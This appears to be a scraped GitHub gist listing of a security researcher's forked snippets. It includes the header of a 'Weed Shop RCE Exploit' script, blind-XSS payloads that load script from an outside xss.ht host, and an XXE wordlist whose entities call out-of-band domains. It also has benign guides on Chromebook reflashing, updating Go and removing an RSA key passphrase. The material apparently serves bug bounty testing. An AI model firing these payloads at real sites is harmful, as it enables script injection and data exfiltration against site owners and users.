Chase Jensen ruevaughn

@ruevaughn
ruevaughn / weedshop_exploit.py
Created July 3, 2023 07:12 — forked from pich4ya/weedshop_exploit.py
Weed Shop RCE Exploit
#!/usr/bin/env python
# @author Pichaya Morimoto ([email protected])
# 2023-03-07
# Weed Shop RCE Exploit
import requests
def create_dbfile(filename):
# Vulnerability 1: IP Spoofing
# File: function.php
@ruevaughn
ruevaughn / asus c201.md
Created July 3, 2023 06:57 — forked from 0xBADCA7/asus c201.md
Disabling SPI write protection, reflashing, and unbricking an Asus Chromebook C201

#### Disabling SPI write protection

Put the Chromebook in developer-mode:

  • With the machine powered off, hold down Esc and Refresh (F3) while pressing the power button
  • At the warning prompt, hit Control+D, then Enter at the prompt about enabling developer mode
  • Machine will format itself

Now remove the write-protect screw to enable flashrom to flash new Coreboot/Libreboot.

Flip the powered-off machine over and remove the 8 Phillips-head screws. 2 are located under rubber feet.

@ruevaughn
ruevaughn / update-golang.md
Created July 1, 2023 18:38 — forked from nikhita/update-golang.md
How to update the Go version


System: Debian/Ubuntu/Fedora. Might work for others as well.

1. Uninstall the existing version

As mentioned here, to update the Go version you will first need to uninstall the original version.

To uninstall, delete the /usr/local/go directory by:

"><script src=https://username.xss.ht></script>
'><script src=https://username.xss.ht></script>
";eval('var a=document.createElement(\'script\');a.src=\'https://username.xss.ht\';document.body.appendChild(a)')
@ruevaughn
ruevaughn / report.py
Created July 1, 2023 17:59 — forked from Huntinex/report.py
Automatic bug bounty report generator
import poe, sys
client = poe.Client("<POE_API_KEY_HERE>")
title=sys.argv[1]
path=sys.argv[2]
more=""
if len(sys.argv) > 3:
    more="\" and here is more information: "+sys.argv[3]
message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+"""
@ruevaughn
ruevaughn / xxe-payloads.txt
Created June 24, 2023 05:13 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@ruevaughn
ruevaughn / gist:19a682390bc63c56777dee5bfaf6b857
Created June 24, 2023 04:42 — forked from agungf/gist:8803512
Remove passphrase (password) from private RSA key
Should also work for:
[v] any OpenSSH installation
Given, your key is in id_rsa
1
Passphrase is needed?
Try some host which has your public key (id_rsa.pub)
@ruevaughn
ruevaughn / gist:4ef2af2eceec54791f4581600f070f2e
Created June 24, 2023 04:41 — forked from mswell/gist:348493f33c061b15203f379de8453251
Remove passphrase (password) from private RSA key
Should also work for:
[v] any OpenSSH installation
Given, your key is in id_rsa
1
Passphrase is needed?
Try some host which has your public key (id_rsa.pub)